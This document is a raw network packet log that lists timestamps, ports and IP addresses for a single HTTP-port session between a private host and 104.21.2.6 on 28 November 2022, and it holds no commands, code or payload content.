Nov 28, 2022 16:37:04.292903900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292916059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292928934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292938948 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.292952061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.292965889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.293108940 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.293267965 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.305561066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305639982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305655003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305681944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305701971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305706978 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.305736065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305757046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305768967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305782080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305794954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305807114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305819035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305830956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305844069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305869102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305877924 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.305888891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305901051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305912018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305923939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305934906 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305947065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.305979013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306046963 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.306046963 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.306067944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306080103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306092024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306103945 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306116104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306127071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306152105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306168079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306201935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306215048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306217909 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.306231976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306243896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306253910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306266069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306277990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306375980 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.306405067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306418896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306431055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306442976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306453943 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306466103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306476116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306488037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306513071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306525946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306539059 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.306539059 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.306545973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306559086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306571960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306598902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306651115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306663990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306675911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306688070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306699991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306703091 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.306756020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306768894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306781054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306793928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306807041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306828022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.306896925 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.307024002 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.307024002 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.323779106 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.345273972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345357895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345387936 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345412016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345439911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345463991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345487118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345510960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345539093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345596075 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.345596075 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.345628023 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345799923 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.345799923 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.345855951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345870972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345884085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345906973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345928907 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345936060 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.345963955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345983028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.345995903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346008062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346019983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346031904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346044064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346055984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346067905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346081018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346092939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346103907 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.346103907 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.346112967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346124887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346137047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346148968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346162081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346183062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346204042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346225977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346241951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346254110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346266985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346275091 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.346290112 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346302986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346317053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346329927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346343040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346357107 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346369982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346383095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346395969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346410036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346422911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346436977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346441984 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.346455097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346468925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346482038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346493006 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.346507072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346524954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346539021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346558094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346579075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346601963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346625090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346641064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346653938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346662045 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.346662998 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.346676111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346688986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346703053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346735001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346749067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346761942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346776009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346788883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346801996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346816063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346828938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346842051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346856117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346868992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346877098 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.346893072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346910954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346925020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.346935987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347034931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347047091 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.347047091 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.347110987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347134113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347145081 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.347156048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347170115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347182989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347197056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347209930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347223997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347237110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347249985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347264051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347276926 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347290993 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347304106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347315073 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.347323895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347337961 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347352028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347364902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347378969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347392082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347405910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347419977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347433090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347445965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347465992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347469091 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.347469091 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.347486973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347636938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347640991 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.347671032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347692966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347714901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347733021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347744942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347757101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347769976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347781897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347794056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347809076 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.347817898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347839117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347862959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347886086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347908020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347930908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.347980022 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.347980022 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348016024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348040104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348066092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348073006 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348103046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348124981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348148108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348170042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348192930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348215103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348242998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348247051 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348277092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348305941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348337889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348357916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348381042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348404884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348408937 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348408937 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348408937 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348445892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348469973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348495007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348516941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348541975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348562002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348577023 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348598003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348619938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348642111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348664045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348676920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348690033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348701954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348714113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348726034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348737955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348746061 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348746061 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348746061 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348762989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348774910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348788023 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348799944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348815918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348836899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348859072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348877907 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348891020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348903894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348913908 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.348922014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348934889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348948002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348959923 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348972082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348984003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.348995924 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349013090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349034071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349056959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349076986 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.349076986 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.349090099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349102974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349114895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349127054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349138975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349150896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349163055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349174976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349186897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349206924 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349229097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349246025 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.349258900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349275112 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349287987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349292040 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.349307060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349320889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349334002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349348068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349361897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349375010 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349387884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349401951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349415064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349428892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349451065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349469900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349484921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349600077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349613905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349627018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349633932 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.349633932 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.349651098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349664927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349678040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349690914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349704981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349719048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349739075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349757910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349776983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349798918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349803925 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.349824905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349838972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349852085 CET	80	49830	104.21.2.6	192.168.11.20
